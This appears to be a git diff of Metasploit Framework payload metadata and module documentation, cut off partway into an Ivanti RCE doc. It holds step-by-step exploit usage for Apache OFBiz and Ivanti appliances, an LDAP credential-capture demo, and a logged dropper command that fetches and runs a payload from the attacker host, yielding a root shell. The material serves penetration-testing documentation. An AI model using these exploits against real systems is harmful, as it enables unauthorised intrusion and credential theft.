"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp",
|
||||
@@ -222794,7 +226455,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222804,7 +226465,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4",
|
||||
@@ -222836,7 +226497,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222846,7 +226507,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid",
|
||||
@@ -222877,7 +226538,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222887,7 +226548,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp",
|
||||
@@ -222923,7 +226584,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222933,7 +226594,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4",
|
||||
@@ -222965,7 +226626,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222975,7 +226636,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid",
|
||||
@@ -223006,7 +226667,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -223016,7 +226677,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell_bind_tcp",
|
||||
@@ -223045,7 +226706,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -223055,7 +226716,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp",
|
||||
@@ -223084,7 +226745,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223095,7 +226756,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -223127,7 +226788,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223138,7 +226799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -223170,7 +226831,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223181,7 +226842,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe",
|
||||
@@ -223212,7 +226873,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223223,7 +226884,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp",
|
||||
@@ -223259,7 +226920,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223270,7 +226931,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -223302,7 +226963,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223313,7 +226974,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -223345,7 +227006,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223356,7 +227017,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http",
|
||||
@@ -223390,7 +227051,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223401,7 +227062,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https",
|
||||
@@ -223432,7 +227093,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223443,7 +227104,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp",
|
||||
@@ -223479,7 +227140,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223490,7 +227151,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -223522,7 +227183,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223533,7 +227194,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -223565,7 +227226,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223576,7 +227237,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp",
|
||||
@@ -223608,7 +227269,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223619,7 +227280,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps",
|
||||
@@ -261452,7 +265113,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-02-08 13:47:34 +0000",
|
||||
"mod_time": "2024-01-31 18:07:07 +0000",
|
||||
"path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/manage/mssql_local_auth_bypass",
|
||||
|
||||
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By
|
||||
|
||||
## Using msfdb
|
||||
|
||||
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
|
||||
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
|
||||
```
|
||||
Creating database at /Users/your_current_account_name/.msf4/db
|
||||
Starting database at /Users/your_current_account_name/.msf4/db...success
|
||||
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
|
||||
Creating initial database schema
|
||||
```
|
||||
|
||||
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
|
||||
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information. If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:
|
||||
|
||||
msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
|
||||
```
|
||||
msf6 > db_status
|
||||
[*] Connected to msf. Connection type: postgresql.
|
||||
```
|
||||
|
||||
You can also setup a Web Service, which Metasploit can use to connect to the database you have just created. Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:
|
||||
|
||||
```
|
||||
[?] Initial MSF web service account username? [your_current_account_name]:
|
||||
|
||||
@@ -0,0 +1,52 @@
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module emulates an LDAP Server which accepts User Bind Request to capture the User Credentials.
|
||||
Upon receiving successful Bind Request, a `ldap_bind: Authentication method not supported (7)` error is sent to the User
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/server/capture/ldap`
|
||||
3. Do: `run`
|
||||
4. From a new shell or workstation, perform a ldap bind request involving User credentials.
|
||||
5. Check the database using `creds` for the user authentication information.
|
||||
|
||||
## Options
|
||||
|
||||
**Authentication**
|
||||
|
||||
The type of LDAP authentication to capture. The default type is `Simple`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Metasploit Server
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/server/capture/ldap
|
||||
msf6 auxiliary(server/capture/ldap) > run
|
||||
|
||||
[*] Server started.
|
||||
[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
|
||||
```
|
||||
|
||||
### Client
|
||||
|
||||
```
|
||||
└─$ ldapsearch -LLL -H ldap://10.0.2.15 -D cn=User,dc=example,dc=com -W
|
||||
Enter LDAP Password:
|
||||
ldap_bind: Auth Method Not Supported (7)
|
||||
additional info: Auth Method Not Supported
|
||||
```
|
||||
|
||||
**Database**
|
||||
|
||||
```
|
||||
msf6 auxiliary(server/capture/ldap) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
10.0.2.15 10.0.2.15 389/tcp (ldap) User Pass example.com Password
|
||||
```
|
||||
@@ -4,14 +4,25 @@
|
||||
|
||||
This module exploits a Java deserialization vulnerability in Apache
|
||||
OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
|
||||
versions prior to 17.12.04.
|
||||
versions prior to 17.12.01 using the `ROME` gadget chain.
|
||||
|
||||
Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
|
||||
and use the `CommonsBeanutils1` gadget chain.
|
||||
|
||||
Verified working on 18.12.09, 17.12.01, and 15.12
|
||||
|
||||
### Setup
|
||||
|
||||
#### 15.12
|
||||
|
||||
You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
|
||||
|
||||
1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
|
||||
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
|
||||
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
|
||||
|
||||
#### 18.12.09
|
||||
|
||||
`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
@@ -27,9 +38,11 @@ This executes a Unix command.
|
||||
|
||||
This uses a Linux dropper to execute code.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Apache OFBiz from [Docker](#setup).
|
||||
### Apache OFBiz from [Docker](#setup) 15.12.
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
|
||||
@@ -101,3 +114,50 @@ BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Apache OFBiz from [Docker](#setup) 18.12.09.
|
||||
|
||||
```
|
||||
[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization
|
||||
[*] Using configured payload linux/x64/meterpreter_reverse_https
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
ssl => false
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080
|
||||
rport => 8080
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999
|
||||
srvport => 8999
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999
|
||||
lport => 9999
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1
|
||||
lhost => 172.17.0.1
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit
|
||||
|
||||
[*] Started HTTPS reverse handler on https://172.17.0.1:9999
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated. Apache OFBiz detected
|
||||
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
|
||||
[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG
|
||||
[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG
|
||||
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
|
||||
[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...
|
||||
[*] Command Stager progress - 100.00% done (112/112 bytes)
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500
|
||||
[*] Server stopped.
|
||||
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid
|
||||
Server username: root
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Debian 11.4 (Linux 6.5.0-kali3-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) >
|
||||
```
|
||||
@@ -0,0 +1,189 @@
|
||||
## Vulnerable Application
|
||||
This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection
|
||||
vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
|
||||
Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
|
||||
22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions
|
||||
8.x and below are also vulnerable.
|
||||
|
||||
## Testing
|
||||
To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
|
||||
below steps are for HyperV, but it should be very similar to install on VMWare.
|
||||
|
||||
* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
|
||||
* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
|
||||
* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
|
||||
* Boot the VM and follow the console instructions to install the product.
|
||||
* After installation completes, you will have created an admin account and password. You can log into the admin
|
||||
web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
5. `check`
|
||||
6. `exploit`
|
||||
|
||||
## Scenarios
|
||||
